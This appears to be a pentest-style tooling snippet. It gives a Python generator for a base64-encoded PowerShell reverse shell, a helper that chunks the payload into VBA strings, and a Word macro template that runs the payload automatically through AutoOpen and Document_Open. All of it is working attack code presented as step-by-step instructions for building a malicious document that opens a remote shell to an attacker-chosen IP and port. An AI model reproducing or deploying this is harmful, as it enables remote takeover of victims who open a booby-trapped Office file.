ps_gen.py
import sys
import base64
def help():
print("USAGE: %s IP PORT" % sys.argv[0])
print("Returns reverse shell PowerShell base64 encoded cmdline payload connecting to IP:PORT")
exit()
try:
(ip, port) = (sys.argv[1], int(sys.argv[2]))
except:
help()
payload = '$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
payload = payload % (ip, port)
cmdline = "powershell -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()
print(cmdline)Copy the output and paste it inside the following file and then run it.
vba_formatter.py
str="powershell -e [paste the encoded string]"
n=50
for i in range(0,len(str),n):
print("Str = str+" + '"' + str[i:i+n] +'"')The template to use:
Sub AutoOpen()
MyMacro
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub MyMacro()
Dim Str As String
Str = Str + "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAt"
Str = Str + "AE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAF"
.
.
.
CreateObject("Wscript.Shell").Run Str
End Sub